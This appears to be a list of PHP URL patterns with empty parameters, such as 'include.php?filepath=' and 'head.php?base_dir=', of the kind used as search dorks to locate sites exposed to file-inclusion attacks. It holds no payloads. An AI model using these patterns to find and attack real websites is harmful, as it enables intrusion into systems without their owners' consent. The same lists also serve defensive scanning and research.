layout.php?basepath=

start.php?header=

pagina.php?modo=

blank.php?in=

base.php?name=

index.php?adresa=

down*.php?u=

nota.php?goFile=

main.php?mod=

file.php?start=

view.php?redirect=

index2.php?u=

head.php?base_dir=

mod*.php?recipe=

press.php?pr=

padrao.php?*[*]*=

info.php?ev=

layout.php?opcion=

index1.php?nivel=

include.php?seccion=

print.php?rub=

view.php?lang=

index.php?pr=

mod*.php?include=

general.php?seite=

pagina.php?numero=

mod*.php?seccion=

principal.php?pollname=

include.php?read=

*inc*.php?pg=

press.php?rub=

index2.php?incl=

pagina.php?chapter=

view.php?middle=

print.php?sekce=

nota.php?rub=

padrao.php?pname=

view.php?seite=

head.php?ref=

pagina.php?recipe=

principal.php?link=

index.php?pref=

page.php?action=

page.php?ev=

show.php?ir=

gallery.php?menue=

template.php?op=

info.php?doshow=

head.php?index=

mod*.php?pname=

view.php?ir=

default.php?sivu=

*inc*.php?start=

principal.php?rub=

principal.php?corpo=

padrao.php?middle=

nota.php?pagina=

sitio.php?content=

base.php?pname=

press.php?thispage=

template.php?header=

press.php?pa=

index1.php?redirect=

padrao.php?menue=

index2.php?sekce=

mod*.php?d=

view.php?sp=

include.php?filepath=

main.php?name=

nota.php?m=

blank.php?open=

head.php?dir=

principal.php?l=

page.php?pname=

layout.php?oldal=

*inc*.php?k=

index.php?pollname=

include.php?b=

head.php?oldal=

index1.php?str=

layout.php?pollname=

start.php?play=

template.php?choix=

down*.php?pollname=

page.php?recipe=

template.php?corpo=

nota.php?sec=

print.php?r=

info.php?*[*]*=

sub*.php?*[*]*=

page.php?q=

mod*.php?addr=

index1.php?type=

base.php?category=

gallery.php?y=

standard.php?lang=

gallery.php?page=

index2.php?d=

index.php?action=

press.php?pname=

down*.php?v=